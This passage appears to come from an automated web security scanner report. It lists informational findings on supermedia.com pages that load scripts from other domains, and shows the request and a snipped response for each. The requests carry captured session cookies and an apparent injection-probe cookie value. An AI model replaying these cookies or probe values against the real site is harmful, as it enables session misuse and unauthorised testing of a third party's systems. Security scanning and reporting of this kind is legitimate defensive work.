<!-- end wrapper -->
       
       <script type="text/javascript" charset="utf-8" src="http://cdn.stumble-upon.com/js/attach_su.js?v=20110203"></script>
...[SNIP]...

19.197. http://www.supermedia.com/about-us  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /about-us

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-us HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:26:33 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>About SuperMedia | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.198. http://www.supermedia.com/about-us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /about-us/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-us/ HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:21:15 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>About SuperMedia | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.199. http://www.supermedia.com/about-us/corporate-profile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /about-us/corporate-profile

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-us/corporate-profile HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:21:18 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Corporate Profile | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.200. http://www.supermedia.com/about-us/executive-team  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /about-us/executive-team

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-us/executive-team HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:50:27 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Executive Team | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.201. http://www.supermedia.com/advertising-goals  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /advertising-goals

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /advertising-goals HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:27:54 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Advertising Goals | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.202. http://www.supermedia.com/business-email  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /business-email

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-email HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:27:28 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Small Business Email | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.203. http://www.supermedia.com/business-listings  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /business-listings

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-listings HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:26:32 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Get Your Free Business Listing | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.204. http://www.supermedia.com/business-listings/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /business-listings/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-listings/ HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:21:28 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Get Your Free Business Listing | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.205. http://www.supermedia.com/business-listings/coupons  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /business-listings/coupons

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-listings/coupons HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:21:36 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Coupons | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.206. http://www.supermedia.com/business-listings/listing-enhancements-packages  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /business-listings/listing-enhancements-packages

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-listings/listing-enhancements-packages HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:21:31 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Listing Click Packages | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.207. http://www.supermedia.com/careers  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /careers

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /careers HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:27:32 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Careers</title>


<link type="text/css" rel="stylesh
...[SNIP]...
<!--
By use of this code snippet, I agree to the Brightcove Publisher T and C
found at https://accounts.brightcove.com/en/terms-and-conditions/.
-->

<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.208. http://www.supermedia.com/careers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /careers/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /careers/ HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:23:07 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Careers</title>


<link type="text/css" rel="stylesh
...[SNIP]...
<!--
By use of this code snippet, I agree to the Brightcove Publisher T and C
found at https://accounts.brightcove.com/en/terms-and-conditions/.
-->

<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.209. http://www.supermedia.com/client-solutions/advertising-goals/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /client-solutions/advertising-goals/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /client-solutions/advertising-goals/ HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:23:24 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Client Solutions | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.210. http://www.supermedia.com/client-solutions/client-stories  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /client-solutions/client-stories

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /client-solutions/client-stories HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:23:27 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Client Stories Sign Up | SuperMedia.com Advertising</title>



...[SNIP]...
<!--
By use of this code snippet, I agree to the Brightcove Publisher T and C
found at http://corp.brightcove.com/legal/terms_publisher.cfm.
-->

<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.211. http://www.supermedia.com/client-solutions/local-retail  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /client-solutions/local-retail

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /client-solutions/local-retail HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:23:17 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Local Retail Advertising | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.212. http://www.supermedia.com/client-solutions/local-service  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /client-solutions/local-service

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /client-solutions/local-service HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:23:31 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Local Service Providers | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.213. http://www.supermedia.com/client-solutions/local-service/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /client-solutions/local-service/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /client-solutions/local-service/ HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:23:17 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Local Service Providers | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.214. http://www.supermedia.com/client-solutions/national-brand-agencies  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /client-solutions/national-brand-agencies

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /client-solutions/national-brand-agencies HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:23:24 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>National Brand and Agency Building | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.215. http://www.supermedia.com/client-solutions/share-the-wealth  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /client-solutions/share-the-wealth

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /client-solutions/share-the-wealth HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:23:45 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Share the wealth</title>


<link type="text/css" rel
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.216. http://www.supermedia.com/client-solutions/web-based-business  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /client-solutions/web-based-business

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /client-solutions/web-based-business HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:23:21 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Web Based Business Advertising | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.217. http://www.supermedia.com/community/barter-network  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /community/barter-network

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/barter-network HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:25:16 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Barter Network | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.218. http://www.supermedia.com/direct-mail  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /direct-mail

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /direct-mail HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
